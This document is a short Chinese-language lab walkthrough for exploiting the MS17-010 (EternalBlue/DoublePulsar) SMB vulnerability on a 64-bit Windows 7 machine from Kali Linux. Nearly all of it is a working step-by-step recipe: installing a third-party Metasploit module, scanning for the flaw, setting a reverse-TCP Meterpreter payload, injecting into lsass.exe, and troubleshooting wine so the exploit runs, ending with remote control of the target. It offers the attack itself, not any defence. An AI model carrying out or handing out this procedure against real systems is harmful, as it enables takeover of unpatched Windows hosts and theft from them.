1. 環境
- Kali 64bit(攻擊機)
- windows7 SP1 64bit(靶機)
2. 利用的模組
github:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. 開始
利用的模組載入 Kali
如下:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
#把 deps目錄 And eternalblue_doublepulsar.rb 作複製動做,預設是沒有此模組。
cp -r Eternalblue-Doublepulsar-Metasploit/deps/ \
/usr/share/metasploit-framework/modules/exploits/windows/smb/ \
cp -r Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb \
/usr/share/metasploit-framework/modules/exploits/windows/smb/
cp -r Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb \
/usr/share/metasploit-framework/modules/auxiliary/scanner/msf/
4. 開啟 msfconsole
5. ms17-010 漏洞檢查
use auxiliary/scanner/smb/smb_ms17_010 #接著如下圖作
show options
set RHOSTS IP # 設定靶機的IP
6. Exploit ms17-010
由於沒設定靶機 IP,以下進行設置
set RHOSTS IP # 設定靶機的IP
#設定 PAYLOAD(因為是 64 bit,所以需要設定)如果是 windows/meterpreter/reverse_tcp,會獲取不到 Session。
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit #建立不起 Session
show options #檢查
set PROCESSINJECT lsass.exe #因為是 64 bit 所以要更改成這個
exploit # 在一次,這次成功進去如下
接著,就可操控靶機了
如果發現 exploit
出現 wine
的問題,請如下解決看看。
dpkg –add-architecture i386 && apt-get update && apt-get install wine32